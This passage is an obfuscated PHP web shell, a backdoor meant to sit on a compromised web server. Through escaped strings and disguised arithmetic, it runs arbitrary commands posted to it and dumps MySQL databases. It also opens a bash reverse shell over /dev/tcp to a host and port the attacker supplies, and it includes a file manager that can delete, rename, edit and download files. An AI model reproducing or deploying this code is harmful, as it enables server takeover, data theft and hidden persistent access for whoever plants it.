\x76\141\x6cue=\x22D\x65c\157de\042\076<\x2ft\144>\x0d\x0a</tr>\015\x0a\x3c/ta\142le\x3e\x20\x0d\x0a<\057\146orm>\015\012</\160re>\015\012</di\x76>\x0d\x0a\x3cdiv\040\163tyle=\x22f\154o\141t: le\x66t\073disp\154ay\072bl\157ck;wid\x74h:\062\0608\160\x78\042>\x0d\012<\x70\162e>\015\012\074\x66orm  m\145\x74hod\x3d\x22\120\117ST\042\076\x0d\x0a<l\141b\145l\076<b\x20\x63l\x61ss=\042\x62\x74\042>\x42ac\x6bConnect\x3a</b></\154\x61b\145l\x3e\015\012<i\x6eput\x20st\171l\x65\075\042wid\x74h:1\067\x38\x70x\x22 t\x79p\x65=\042te\x78\x74\x22 nam\x65=\042\x68\157s\164_\x22\040p\154\141c\145\x68ol\x64\145\162=\x22Ent\x65r \x68\x6f\x73t\x7c\x70or\164\042 \x72eq\x75i\x72\x65\x64\076\x0d\x0a<\164\x61b\x6ce cl\x61\163\163\x3d\x22y\141\x22>\x0d\012\074t\x72>\015\x0a<t\144\x20style=\x22pa\x64ding: 0\073bo\x72der\072 n\157\156e\x22><in\x70ut s\x74\171\x6c\x65=\042\155a\x72gin-l\x65ft\x3a\040-1p\x78;wid\x74h\x3a 96p\170;\x22 t\171pe=\042\x73\x75\142mit\x22\040n\141m\x65=\042\x72e\x76er\x73\x65\042 \166alue=\x22R\x65vers\145\042>\074/td\076\x0d\x0a\074\x2f\164r\x3e\x0d\012</\x74ab\x6c\x65>\015\x0a<\057f\x6frm\076\015\x0a\074/pr\145>\x0d\x0a<\x2f\144\151\x76>\x0d\x0a<hr\040\163tyle=\042\143lear:\x62oth\042>\x0d\x0a\074\x2fd\x69\166\076";echo$_uvdkc;$_ynpsbyx="p\x61\x73"."\163th"."\x72u";$_rcybrnu="ex"."ec";$_vjkwif="\167\150\151c\x68\040\x67et\x3bwhic\x68 w\147\145\164;whi\x63\x68\040l\171\x6e\x78\x3b\167h\151ch\040curl\073w\150i\143\150 fetch\x3bwhi\143\150 \x6cink\x73;";$_szxgsfl="b\141"."\163\145"."\066"."4"."_"."en"."c\157"."de";$_fjhyzh="ba"."s\145"."6"."\064"."\x5f"."\x64\145"."\x63\157"."d\x65";$_naqt=$_fjhyzh("cG\x68wIC1y\111C\144\x77c\x6d\154u\x64\x469yK\x47dldF9k\x5aW\x5a\160\x62m\126kX\x32\x5a1b\x6dN0a\1279\165cyg\x70KTs\x6eIH\x77g\1323J\x6cc\x43At\122\x53An\111\103h\x7aeXN0ZW\061\070ZXhlY\063xz\x61GV\x73b\x469leG\x56j\x66H\x42hc3N\060a\110\x4a1\x66HByb\x32\x4e\x66\1423Blbn\170wb\063Bl\x62\156\170\152d\x58\x4a\163X\062V\064\132\127N8Y3Vyb\x469\164dWx0\x61V9le\107V\152fHBhcn\116l\x582\x6c\x75\x61V9m\141Wxlf\110N\x6f\x62\x33d\x66\1432\x391\143\x6dNlK\123\143");if(isset($_POST["cm\144"])){echo"\074\x70re\x3e";$_ynpsbyx($_POST["cmd"]);echo"<\x2f\160r\x65>";}if(isset($_POST["\x69\x6efo"])){echo pHpiNfo();}if(isset($_POST["\144o\x77\x6e"])){echo"\074\164\145xtarea\040\143ols=37\040r\157\167\163\0757 \x73\164\171le=\x22pad\144ing:\0405p\x78\073\x72e\163\x69\x7ae: \156on\x65\073\x22>";$_ynpsbyx($_vjkwif);echo"<\x2ft\x65x\164\x61r\x65\141\x3e";}if(isset($_POST["f\165n"])){echo"<pre\076";$_ynpsbyx($_naqt);echo"\074/p\162\x65\076";}if(isset($_POST["DB"])){$_rmxcbki=$_POST["host"];$_lykvo=$_POST["\165\x73\145r"];$_grmrqyui=$_POST["\x70a\163s"];$_ldni=$_POST["\156\x61m\145"];$_cgxnet=$_POST["\x70\x6frt"];$_vwtg=new MYSQLI($_rmxcbki,$_lykvo,$_grmrqyui,$_ldni,$_cgxnet);if($_vwtg->connect_error){die("<b \x63\154\x61\163s='\160\x6d'>Da\164\141b\141s\x65\x20ac\143es\163 \151s\x20not \141v\141ila\x62le:</\142><\x62r>".$_vwtg->connect_error);exit();}else{$_rcybrnu("mys\161ldum\x70\040-\x2dpo\x72t=".$_cgxnet."\040\055\055u\x73er=".$_lykvo."\040--\x70\x61\163\163\x77\157r\x64=".$_grmrqyui." --host=".$_rmxcbki."\x20".$_ldni." >\x20f\151l\145.sq\x6c");echo"<\142\040c\x6c\x61\x73\x73\x3d\042\142\164\x22 styl\x65=\x22\x66\157nt-\x73iz\145: 1\x34\160\170\x22\076Du\155p \143\x6f\x6d\160l\x65ted!</\142>";}}if(isset($_POST["\163u\142mit"])){$_cmlwywg=$_POST["b\141se6\064"];$_kiow=$_szxgsfl($_cmlwywg);echo"<\160 cl\141ss\075\x22pm\042\x3e"."En\143\157\x64\145 \142as\x65\066\064\072 "."</p\x3e".$_kiow;}if(isset($_POST["\x73\165b\x6d\x69\x742"])){$_csbnv=$_POST["bas\145\x36\x34"];$_kejistnh=$_fjhyzh($_csbnv);echo"\x3cp cla\163s=\042pm\x22>"."\x44e\x63\157\144e base64\x3a\040"."\074/\x70>".htmlentiTIeS($_kejistnh);}if(isset($_POST["submi\164\137\165"])){$_zfjlqgbp=$_POST["u\162l"];$_wkgd=urLENcODe($_zfjlqgbp);echo"<p cla\163s=\042\160\155\042\x3e"."Enco\x64e url: "."\074/\160>".$_wkgd;}if(isset($_POST["\x73ubm\151\164\137\x752"])){$_aqzs=$_POST["u\x72l"];$_myxishj=UrLDEcoDe($_aqzs);echo"\074p\x20c\154\141\163\x73=\042\160m\x22>"."D\145\x63o\144\145 ur\154\x3a "."\x3c/p>".HTmLEnTitIeS($_myxishj);}if(isset($_POST["sub\x6di\x74\137\x68ex"])){$_oxokbtvz=$_POST["he\170"];$_slvz="0x".Bin2hEx($_oxokbtvz);echo"<\160\040c\154\x61ss\x3d\x22\160\155\042\x3e"."\x45\x6ecode HE\x58: "."\074/\x70\x3e".$_slvz;}if(isset($_POST["su\x62mi\164_\x68e\x782"])){$_wtmefwn=$_POST["he\x78"];$_fgovkbs=heX2bIN(SuBsTR($_wtmefwn,(int)ROund(8.5+8.5)-(01054-0465-0350)));echo"<\x70 \143la\163s=\042p\155\x22>"."Dec\x6fd\145 HEX: "."<\x2f\x70>".HtMLEntItIES($_fgovkbs);}if(isset($_POST["\x72e\166e\x72\163e"])){$_rbre=EXpLODE("|",$_POST["host\x5f"]);$_ynpsbyx("\x62\x61\x73h -c '\142a\163h\040-i &\076\x20\x2fde\166\x2ft\x63p/".$_rbre[(int)round(-173+-173)-(-0405+-0636- -0511)]."/".$_rbre[(int)rOUND(-6.5+-6.5+-6.5+-6.5)-(int)ROuND(-55+-55)+(0777-0733)-(-0116- -0305)]."\x20\x30>&1\x27");}$_wnpanqd="\x3c\x2fd\x69v>\015\x0a<di\x76 id\075\x22t\x6f\x6fls\x22 class\x3d\042to-b\x65-\x63h\x61nged\x22>\x0d\x0a\x20\x20    \040  \040  <f\x6fr\155 \x63\154as\163\x3d\x22all\042 \x69d \075\x22\164\141b\042 \x61\143t\x69on=\x22".$_SERVER["P\x48\x50\137SELF"]."\x22 m\145\164\150\x6fd\x3d\x22\x70\x6f\x73t\x22 \x6e\141\x6de=\x22pa\x74h\042>\015\x0a\040\040     \040\x20 \040 \040  <table \143\154\x61\x73s=\x22\x74o\042\076\x0d\012   \040\x20\x20  \x20 \x20\040  \040   <tr>\x0d\x0a \040  \040   \x20 \040   \x20\x20\x20\x20   <td><\141 href=\x22".$_SERVER["PHP\x5fS\x45\114F"]."\077pa\x74h=".__DIR__."\x22>\x3c\151mg\040\163\x72c=\x22d\141ta\x3aim\x61\x67\x65/\160\x6eg;\x62\x61se6\x34\x2c\151V\x42\x4f\122\x77\060\113\x47g\x6f\101\101\x41ANSU\x68\x45\x55gAAAC\x41AAA\x41\147CAY\101\x41\101\x42z\145nr\060AA\x41ACXB\111W\x58\x4d\101AA\067E\101\101A\x4fxA\107VKw\x34b\x41A\101A\111G\116I\125k0AAH\157l\x41A\103AgwAA\053f8\101AI\104oAAB\123\103A\x41\102FV\x67\x41\101\x44q\x58A\x41\x41X\x629\x64aH\x35A\101AA\x4bj\x53\125\x52BV\x48ja\067\112fPaxNREM\x65/\163\057uiSUOa\x52\126o\x70\x4aZ7\0601\162O\x67\x50b\x56Q\x4b\061g8e\x53mIf\x34\x47g\102Q96\x55d\x43C6E3Bg\0639\x42i\x2fUm\x65G\x6eV\145\157h\160U\x51S\x52iqCe\122\x45OREtIkbZL\165\x37h\x73P2\x36Q\x766b\x37\x4eJo3k\x59Af\155s\120tedj\x34zb\x33\0668EDO\152l2Kg\x783II0HM\x41oT5k\0601dGE\067\x48q\123\065a\x75\x46\146Qj\102vKOj\x454NnJn\114d\107JU\124\146\x77G\101\x46n\116Tey\x77bakbN\x46VigYo\x54\101D\112dj\x59Bt\x6c\x79\x6ba\115S\x47l\x42L\x50cA\065\x50\1235\x2f\103\117\x6a\x47\x2b\x73\x58\113Lamh8oEXl\142D\121\x4e\x67h\x6dG\113z\x52\145L\0635\070C\x71\120\x67CMEtISX\102d\x42\x367r6\15717u\x47\120V\143nGsZZ\111ZXpo\x4a\x49W\103\141A\x6c\120j\x4b\x51B4pAFgu\113\066D2\113lbSK\121\1556x4\x63\x56K\x53UK\1205a\122Pn\110\1015C9\x6c\144R\x57QS2M3\124R\x65\151\x30\x4c/\151\x66\x4f\121\x55sJxbH0O5PIl\x39A3\106wb+f\x77FV\10332m7\126\x70\060\x67\x49o\101Ym\x34U\171\150nU\x41Iy\x66\x6a\x69\x4dd\x4d\111P\143\x38\132\10405TRa\106fg8Jp\x41YJtkX6CBw\126\126QB\x39\064Q\x302Gw\065\141ZwcggYg\x49\x41Aj8iGrIz1\x50VkC467A\x42\x6fBa\x44znES\x6aAljK\x5aEE\105TJx\126Tl\x56Wgp0\111\141\x6bShPN/V1c9\0653H6\070BgB\111\112i2\x63\x48u\x6e3DB\x74RDyJkjoQ\x66Ro\162x\1521+3c\x65\x4e\053\102\161\131BmA\x59w\x4d\x35v\x47p\x328V/d\1060cxq+Xyvg\x32\16423MAw0\x36N\1257\x62\057DhS\053\110fA\x69x\154\163pi\132\x54YM\111\115JqUCL\150\x2bL\x341X\x4b\x39nW\171\141w\x44aN\x589zo0\117K9\062t\125WvSk\112Bq\105q\x73\x61GIEQ51\152jXJ\066\146\x78vL8\x64MO7A4\061\x6a33p\x75\101p\x4d\x4dG\x41yoQ1JKgNl\x62\x61\x38eR\146Q\102ev97rW\x76o\142De\1034ANgb\062Y7b\x52h\x53\1421\x73S+\062V0rN00E\126\150\x63\x757\x446b\x39X\160/\x39+x\x69H\141Y\x56\146\x43AAKOJv\130P\062wr\x74\x57\x47n\x68\155s\102\x39\152YSp\x59\107k\x75R5x\x77I\x64i1\070Ey\x41\122I\157F\x6aaL\151\x58\125\x31\x2b\161\163Tw1F\152\x312e\124\116w\x38\120m\x68\132\x4c\x46tdydq\057lK\172/\171e\x63XX\x70\x63\145\x2fl\x7afyfkCH\1204\x7a+\1518B\057g\064A/9U\x61nj\103\x4b\167\x69YAAAA\x41\x53U\126ORK\x35\103Y\111I=\042\040\164\151\x74le=\x22\110o\x6d\x65\042/\076\074/a\076\074\057t\x64\076\015\012 \x20 \x20 \x20  \x20   \040\x20    \040  "."\074\164\144\040c\154ass\x3d'\143o\154\x27>??\073 \x3c\141 \150re\146='".$_SERVER["PH\120\137SEL\106"]."\077pat\150=".$_hkqxc."'>Up\x20on\145 leve\154</\x61>\074/\164d\076"."\x0d\x0a\x20  \040   \040 \040\x20   \x20  \040  \x20\x3c\x74\x64\076<\141 hre\146\075\042".$_SERVER["H\x54TP\x5fRE\106ERER"]."\x22\076<img s\162c\x3d\x22\144\x61t\x61:ima\x67\145/\160n\x67;b\x61s\x65\0664,\151V\102\117Rw0\x4b\107go\101A\x41\101N\123\125hEUgA\x41ABgAA\101AY\103\101\x59AA\101D\x67\144z34\x41AAACXBI\x57XMAA\101s\x54AAA\x4c\105wEAm\160wY\x41A\101AIG\116\x49U\153\060\101AHo\154AACAgwA\101\x2bf8AAIDo\101\x41BSC\x41\x41BF\x56\x67\101\x41\104q\130\x41\x41A\x58b9\x64\x61\110\065AAA\x41\x4eJ\x53\125R\102VH\152\x61\067N\x56\x4cbxt\x56H\101\130\x77E\x79Rg\x78\123\x4bsIHFc\x69\x33g8\x6e\x68nP2\x2fO\x770yR\x2bN\114\105\071Gc8j\x43\1215\117\x78km\x61\x4am3I\1571\103\x70QaISpD\x51ERSg\x6f\113tRF\167Y\x33\x62\112Z\070Ad\126\x75p\x484E\x56\132YEEEi\x421\121Rf\144\x67\116TLYvpKqW\x68\x70Q\101K\112x\144l\144\063\132/\117\x76\x58\x2fdC0I\x49\x2fs\x6e\x67\146+\104\x66Bf\x43\124I\x76h\x4a\x45dK\x4dDL\x45hg5\166gwdV\x34CIE\x452mFe\x6b\155\x62k\x5auoN\x34U\x32\165\170oO\x62\x34\x4a\x48\060W\x59gNG\x66JR\102\x63qx\116J\x67x\x46kI\147g\x52\x6e\x6c\105\1038nEC\x38n\156\147D\125e\114D\x6a\110F\1121\157VN\142Mi4\x58N\0648Qb\x63n\131S\x69/q\125E9oY\x469\x50P\x54s\x67\x42\x42\x4c\x45\150g\171x\x49QvZ\164\143\x50X7ItVYn\0602Qv\x51VY1\x31\x66Ng8Op\x4f\x6fC\x35\x44k1lz9\x62uFH\x64dY\152X\x39s\x6cI0y\x62Z04fP\155W9\156\x6fc\171nO\x35h\x52DsKU9BeB\165g\147\x68kKAua\x50\x4f\106zS\x4f3nJ\x5aH\x33D\062\x50uJc\x384rR\143\x4d\x72\x78d/\155\x6e\x67\x7a\117B1\x3863\x73l+\113\115/\11148q\065hC\111L34\126\x49\101QSB\x41C\x36\127V91\x54\x78\x66+qRM\156EsPNn84Tss\x6c1S8c\131\x6aer\x5aG\x68r+\110\142\x6d\x56P\131r\x65U4dZnzu\x7a\x77F5Tl0z\124ma\x75\152\154\171w\x69dt+/ObuPX\x54P\111\x396eT\067\x792T\x35\171\127S4o\x66\104\x66\062qzKc3u\121\x6e\053\150\131MDj\x77G\071tk8\1615y2\x53\130\x74Sbt\x4dMc\x37I\1518\x52x\162\x63\127+\120t\053a\123y\131\x78\107\170IZ/\161\110\141\x61\x657Z\112L2+Wf\x632fzN\x2f\x49bx\132\x74DH5\x64\053K\x2b\x39\x55\x37lR3He\x4b2\x77\x78\x5ae2\171f\065\104w\x6f/M\161Oc\122Fn0\12543\160\x74+G\x59\145s\124\053v\x45\161M\126X\x4d\x6a\x58k\x6b8\x467cSrzD\152KU\x55\053ps4\141\161+blwfd\x7a3\061mfW\156f8\x74\x6b\053q\165\1675\x52F\067XmHxv\125wwb\123U\x51X\x69\164A\170p\x56\x6fE\060rQh\071a\0573X\067\x49t\x56MnLBJv\x71\x79sZ\x370WPSW\113\x44\x44\x6a\113Sg\114aVA2D\141\067\x47\122/QV40\170\x68\x6f3jTabm\x6b\x63K74Q\x37y\x53iO8\110\x70\163\x49G\166\127\x55\113s\146xr\x69\x417E\x51\104\163\115\x55\x6eWhU18Onwp\152xdxS\152\062\x74\147fA\x37\163X\x59B2G\121\x69\x42B\110lO\102T\120\x47qoPv\065b4\x757\x31\121I\x50y\153G+4Ce7CH0Z\101+h\062+y\065ny49\147u\150AD\x45\155Xf\132\066fE\1649Numy\x64dp\112\x492D\122\x6f\154\x37\153\120\070\106Mi1A\x55\x4e\154E\127\x44G\x65\130\123\165fX8L8b\112\x7aJV9Q\103QT\x66T\x51d\x58\126qk\111\x39of\x519\112\x6a\153\x61\x6f\114Iap\x468Kraj\127h/\x44OoJDbQ\x54N\x6c\103\x4fp\x35Gw\x61\x56\101\x57\x44XVR\x2b\x7a\102\x37u\165+\x62\x4awHo\060\x69\112\064GI\x68\x6b\x6f\x75g2Q\x69Q6c\x42dw\x47XA\x31\x48tKs/\x4f\101e\x705\125+\142Un//m\070D\145ks\125K\111s\107\132Y\145\112VxKdzB\1513\057d/\057M\x6e8fA\x48P\160K\062j\160Q\060\062\145A\101AA\101ElF\x54k\123\x75Qm\x43\x43\042\040ti\x74le=\x22\107o\040b\141c\x6b\x22/\076</\141\x3e</td\076\x0d\x0a\040  \x20\x20 \x20      \040   \x20\040\x20 \074t\144>Pat\150\072 \074\x69np\165t st\x79\154e=\x22\x62\x6f\x72der:\040\x31\x70\170 so\154\151\x64\x20#cc\143c\x63\143;w\151\x64\x74h:\04012\065\060px\073\x22 na\x6d\x65\075\x22p\x61t\150\x22\x20t\x79pe=\042te\x78\164\042 va\154\165e\x3d\x22".geTcWD()."\042 \x2f\076\x0d\012  \x20  \040\040\040\040 \040 \x20           <\151\x6epu\164 s\x74yl\145\075\042b\157r\x64e\x72: 1px so\154i\x64\x20#c\143cc\143c;\x22 ty\x70e=\x22su\x62\x6di\164\042 n\141\x6d\145\x3d\042\163u\x62\x6ditBtn\x22 valu\145=\042\x47o \x64\151r\042\040\x2f>\x0d\x0a  \040\x20  \x20  \x20    \x20\x20 \040\040\040 </t\x64>\x0d\012\x20   \x20\040 \x20  \x20          \040\040   \040     \x20 </t\162>\x0d\x0a       \x20\x20    \x20 \x3c/\x74abl\x65>\x0d\x0a  \x20  \x20 \x20\040\x20\x20 \x3c/\x66orm>";echo$_wnpanqd."<\144i\166\040\143\154ass=\x27al\154\047\x20id='\162esul\x74'><form method=\047po\x73\164'\x20\141c\164i\157\156='#\x6f\160\145\156\x4dodal\047\x3e<ta\x62le\040i\x64\075'f\151rs\x74t\141b\047>";echo"\074t\x72\040\163ty\x6c\x65 =\x20'\x62\x61ck\147ro\x75nd-c\157\x6co\162\x3a \0437\063afe\064;c\x6f\154\157r:\040\0430\105\061\x375D;\150eight\x3a \0624\x70x\x3b'><td></\x74\144>"."<td\x3e"."N\x61me"."\x3c/td>"."<td>"."Acti\x6fn"."</t\x64>"."<t\144\x3e"."\x50\145r\155\x69s\x73i\x6fn\163"."</\164\144>"."<t\x64\076"."\x4fw\x6eer\x2fGr\x6fu\x70"."<\x2ftd\076"."\074\x74\x64\076"."\115o\x64\151\146\x79"."<\057td\x3e"."<td>"."\123\151ze"."<\057td\x3e<\x2ftr>";$_shwl=array();$_aqruztoq=array();$_zqcs=array();while(false!==($_mkmoxkqd=reaDdiR($_gtypsxr))){if(IS_link($_mygveyhr."/".$_mkmoxkqd)){ArrAy_pUsh($_zqcs,$_mkmoxkqd);}elseif(iS_FIle($_mygveyhr."/".$_mkmoxkqd)){ArrAy_PUsH($_aqruztoq,$_mkmoxkqd);}elseif(Is_dIR($_mygveyhr."\057".$_mkmoxkqd)){ARrAy_pUSh($_shwl,$_mkmoxkqd);}}clOSeDIr($_gtypsxr);}else{echo"\x3c\x64\151\166><span cl\141\x73\163=\042e\x72r\x6fr\x22>C\141n\047\164 op\145\x6e\040\x66\x6fld\x65\162!\074br><\142r><a\x20\x63\x6ca\163s=\042\x61_\x73\151\172e\042 href=\x22".$_SERVER["HTTP\137R\x45\x46ERER"]."\042\x3e\x2d->\040\x47\157 b\141\143k\x20<\055-</a>\074/s\x70\x61\156\076<\057\x64iv\x3e";}SOrt($_shwl);SORT($_aqruztoq);Sort($_zqcs);$_yugnbt=ARRAY_MErge($_shwl,$_aqruztoq,$_zqcs);foreach($_yugnbt as$_mkmoxkqd){if($_mkmoxkqd!="."&&$_mkmoxkqd!=".\056"){$_eyioktbq=$_mkmoxkqd;$_hbweya=POsIX_gEtPWUId(fILEowNer($_mkmoxkqd))["\156\x61\155\145"]."\x2f".PoSIx_geTgRGid(filegrOuP($_mkmoxkqd))["n\x61m\x65"];if(STRLEN($_mygveyhr)==((0255-0132- -0323+-0456)+(-050+04)+(int)roUnd(14+14)+(0454+02-01015- -0360))){$_mkmoxkqd=$_mygveyhr.$_mkmoxkqd;}else{$_mkmoxkqd=$_mygveyhr."/".$_mkmoxkqd;}if(IS_lInk($_mkmoxkqd)){$_ytia=rEAdlINk($_mkmoxkqd);if(sTRpoS($_ytia,"\x2f")!=(int)rouND(0+0)){$_ytia="\057".$_ytia;}if(IS_filE(reAdLINK($_mkmoxkqd))){echo"\074t\x72 \x74abindex=\x270'\x20clas\x73=\x27n\x6fte'\x3e<t\x64\x20cla\x73s\075\x27cbox'>"."\074input\x20t\x79pe='che\143kbo\x78'\040na\155e\x3d\x27ch\157\x6fse\133]' v\141\154ue=\x27".$_mkmoxkqd."'>"."\x3c/\x74\x64>"."<\164d\040c\x6c\141s\163\075'\x63ol'>&#\x31015\060;"."\x3c\151np\165t c\154\141\163s='o\160enf al\x6c'\040typ\x65='s\165bmit\047 na\155\x65\075'\166\x69ew\x27 va\154\165e=".$_eyioktbq.">"."</\164d>"."\x3ct\x64>"."<inp\x75t\040sty\x6ce=\047\142ord\x65\162\072\x20\061\160\x78 s\x6fl\x69\144\040#\x63\143\x63ccc;\047\040n\141\155\x65='\144el' val\x75e='\x44'\040\164\x79\x70\x65\075\047su\142m\x69t\x27 \x74\151t\x6ce='\104ele\164e\047>"."<input\040s\x74y\154e\x3d'\142order: 1px \x73o\154\151d\040\x23c\x63\x63c\143\x63;' nam\145\075'ren\x27 v\141\154ue\x3d'\122\047 \x74ype='subm\x69\x74'\040\x74\x69tle='R\x65nam\x65'\076"."<inpu\x74\x20st\x79le\x3d'bor\x64e\162:\0401p\170 \163\157l\151\144\040\x23\143c\x63c\143\143;\047 nam\x65='tou\x27 \166\141lue='T' ty\160e\075\x27su\142\155i\164'\x20\x74\151\x74l\x65\075\x27\x54ouc\x68'\076"."<t\144>"."\x5b"._ddisiu($_mkmoxkqd)."] "._ckskxf($_mkmoxkqd)."<\057td>"."\x3c\164\144>".$_hbweya."\x3c/t\x64>"."<td>".datE("d-m-Y H:\151:s",fILEmtIMe($_mkmoxkqd))."<\x2ftd>"."<td>L\x49\x4e\x4b\074\x2ftd\x3e\x3c/tr>";}else{echo"\x3c\164\162\x20\164a\142i\x6e\x64\145x='0\047 \143\154\141s\x73='\156o\164\145\047><t\x64 class\075'c\x62\x6fx\047>"."\074in\x70\x75t\040\164\171pe='c\150\145\143kbo\170\047\x20\x6eame\075'\x63hoose[]\x27 v\x61l\x75e=\x27".$_mkmoxkqd."'\076"."\x3c\057\x74d>"."<td c\154a\163\x73\x3d'\143\157l'>\046#1\x301\0650\073\x3ca \150\x72ef\075\x27".$_SERVER["\120H\120_SELF"]."\077pa\164\x68=".$_ytia."'\x3e".$_eyioktbq."</\x61> </t\x64>"."<t\144\x3e"."\074in\160u\x74\x20\x73\164yl\x65=\x27b\x6frd\145r:\0401px solid #\143\143ccc\143\073' n\141m\145=\x27del' va\x6c\165\x65\075'\104' \164ype='s\165\142mi\x74\047 title\075\x27D\145l\x65t\145'>"."<\x69\x6eput\040\163\x74\x79le='\x62order\072\040\x31px so\154i\144 \043\143\143cccc\x3b\047 na\155\145=\x27re\156\x27 v\x61l\165e='\x52\x27\x20type=\x27\163\x75\142mit\x27 t\151tle='Rena\155e'>"."<input\x20st\171\154e=\047\142\157\162d\x65r\072 1\160\x78 sol\x69\144 \x23\143c\143\x63cc\073' \x6e\x61me\x3d\x27tou\x27 va\x6c\165e='\x54\x27\040typ\145=\x27s\165bm\151\x74' \x74it\x6c\x65='\x54ouch'\076"."<t\x64>"."["._ddisiu($_mkmoxkqd)."]\040"._ckskxf($_mkmoxkqd)."\074/\x74\144>"."\x3ctd>".$_hbweya."</\x74\x64\076"."\074td>".dATe("d\x2d\x6d-Y \x48:\x69\072s",fILEMTIme($_mkmoxkqd))."<\057td>"."<t\144\x3e\114\111NK<\057t\144\076\x3c\057tr>";}}elseif(IS_fILe($_mkmoxkqd)){$_zkzlbi="";$_riahh=FilesIZE($_mkmoxkqd);if($_riahh<((int)ROUNd(280.75+280.75+280.75+280.75)+(01452+01433-03110- -02217)+(int)ROund(253.25+253.25+253.25+253.25)+(-03533- -05374-06205))){$_zkzlbi="B";}elseif($_riahh<((03777532- -0443)-(04000653-04000152+03776763)+(int)RounD(524123.5+524123.5))){$_zkzlbi="\113B";$_riahh/=(int)ROunD(342+342+342+342)-(int)ROUnD(172+172);}elseif($_riahh<(int)rOuNd(357913941.33333+357913941.33333+357913941.33333)){$_zkzlbi="\115B";$_riahh/=(03776557+03777332-03776455)+(int)roUND(349551.66666667+349551.66666667+349551.66666667)+(-03776522- -04000407-04001440);}echo"\x3c\x74r \164a\x62\151ndex\x3d\x27\x30\047 \143\x6cass\075'\x6e\157\x74e'>\074\x74d\x20\x63l\x61ss\x3d'\143box'>"."<i\x6ep\165t\x20ty\160e='\x63heckbox' n\141me=\047c\x68\x6fo\163e[]\x27\040v\x61\x6cu\x65=\x27".$_mkmoxkqd."'>"."\x3c\x2f\x74d>"."<t\x64\040\143lass='col'><i\155g src\x3d\x27\x64ata:\x69\155age/png;b\141se\0664\054iVB\x4f\122w\x30\113\x47goAAA\x41NSUh\x45\x55\147AAABAA\101AAQC\101YAA\x41A\x668\0579hAA\101ACX\x42\x49WXMAAA\x73\124\101A\101\x4cEwEAm\160w\x59\x41\x41AA\111G\x4e\111\x55k\060A\x41\110o\x6cA\101CA\147w\101A+f8AAID\157\101\101\102S\x43\101\x41\102\106Vg\101A\x44qX\x41AA\x58b9daH5A\x41\x41AFg\x53\x55\122\102VHja\x66J\x4aBb\x74V\x41E\105\124f\117F\x38iipFyLlY\065AK\x77Q\x32\x79gHQ\102\110r\132\111MQCnCE\132\x49\x56E\x4aNa\x63Iu\167\065\x77k\x39ifkJ3FYu\170/ze2\x77\060\147tj9xTVd\x33V\130\x57xj25dXP1it9l\1476N\172\x39/\x38\14570\126\126\156K\154YGgu3\053gfb\066/+O\x6a\x698\x37Ujx\115nx0Sz\x66D\x42\x64\150J\110k\x61\131Nvm5P\151\x6ff\x4cz45o\152w\111kF\104oW\155\141M\1470oB\x55CS37x\x2bwac\x7637Ht\127Qt\0639\x78va\x67\x32\x66zH\153vh7\120y\113tt3\110\x4e\x67bW6\064\067Tty9rO3Yt/e72t\x33\x75\x79WW\x54K\152\x34/h\x7ae\141Pu+7B7z983b5d\x54\x54\062Y\x71mca\x4f4kA\117\x38kEW\x39s\x33q\x36kHY4KIt\1010Rx\157Z\115k\x49\122d5gTj\103\156\x62K6\160\130\x56g\062\x73F2\156\x6d4XMF\x55\x2bZ\x2fyp\x65\x55W\122J\x33G\126H\x6b\101\104\061/Xz\132\x67TU\115\x6f\x32\117\x53\150\1147n\x75uYAmUT\x33\150AikwR\x6bX\063\132Ax\101\x79K\x7a\147\1720V\115ehNwr\x44\x72s\x78H\160\x397\105\171\164\x34\x68\116\070R2\x42Ap\121\x69J\1049\x525J\x5a\150\112\150\x49\x6bVm\x31u\x6dM1\155\1277\x79\x75vbb\x76\145T/x\070\x62\104\x67/bAvB3ANDO\154l1QT\x74u\123AAA\x41\101\x45l\106Tk\x53\165\121mCC\x27 /> "."<i\x6e\160ut \x63la\x73s=\x27\x6f\160enf al\154\x27\x20t\x79p\145='\x73u\x62\155\x69t' n\x61me\075'view' \x76\x61\154\165e=".$_eyioktbq.">"."\074\057\164d>"."<\x74\x64>"."<\x69\156p\165\x74\040styl\x65\075'\142o\x72der:\x201p\x78 \163ol\151\x64\040#\143cc\143cc;\x27 \x6ea\x6d\145=\047d\x65l\x27 \166\141\154\165e\x3d'\104' \164\171\x70e\x3d\x27s\165b\155\x69t\047\x20\164itl\145=\x27De\154e\x74\145'\x3e"."<input\x20\163ty\x6c\145=\x27b\157r\144\x65r: 1px\x20s\x6flid \x23\143c\143ccc;'\x20\156ame=\047r\x65\x6e\x27 \166al\165\145=\x27R\047\x20ty\160e=\x27su\x62mit' \164\x69tle\x3d'\x52e\156\141m\x65\047>"."<i\x6e\160ut st\171le\x3d'bo\162d\x65r:\x20\061px so\154\151\x64 #\x63cc\x63\x63c;' \x6ea\x6d\145=\x27\164o\165' \166al\x75e='\124' \x74\171\x70e\x3d\x27submit\x27 t\x69\x74l\145='\124ouch'>"."<\x69\156pu\x74\x20styl\x65\x3d'\142o\162\144e\162:\0401px s\x6flid\x20#\x63\x63c\x63c\x63\x3b\047\x20\156a\x6de\x3d'e\144it\x27 v\x61l\165\x65='E\047 t\x79\160e\x3d\x27\x73\165bm\x69t' ti\164\x6ce\x3d'E\144i\x74'\076"."<in\x70\165t s\164y\x6ce='b\157\162\144\145\162:\x20\061px s\157l\151d \043c\143c\x63c\x63\073fo\x6et\055\x73\151ze\072\040\061\064p\170;p\x61ddin\x67\055lef\x74: \066p\x78;pad\144\151n\x67-\162i\147ht: \066px\x3b'\x20name='\154o\x61d\x27\x20\x76al\165e=\047\x26#\061\x31\0601\065;' typ\145=\x27s\165bmi\x74\x27 tit\x6ce\075'Do\167\x6e\x6c\157ad'\076"."</td\076"."<td>"."["._ddisiu($_mkmoxkqd)."\135\x20"._ckskxf($_mkmoxkqd)."\x3c\164d\x3e".$_hbweya."\074/td\x3e"."<td\076".dAte("d-\x6d-Y\040H\x3ai\072s",FIlemTimE($_mkmoxkqd))."</t\144\x3e"."<\x74d\076".RouNd($_riahh,(int)ROUNd(29+29+29)-(int)rouNd(21.25+21.25+21.25+21.25))." ".$_zkzlbi."</\x74\144\x3e\074/\164\x72\x3e";}elseif(is_DIr($_mkmoxkqd)){echo"<tr \x74\141bind\x65\170\075\x27\x30'\x20c\x6c\x61\163\x73='n\x6fte'><td c\x6ca\x73\163\x3d\x27c\x62\x6fx'>"."<\x69\156\x70\x75\164 ty\x70e=\047c\x68eck\142ox' \156a\155e\x3d\047ch\x6f\157\x73\145[]\x27 v\141\x6c\165\x65\x3d'".$_mkmoxkqd."'>"."</td>"."\074\164d\040cl\x61\163\163='\143ol'><i\x6d\147 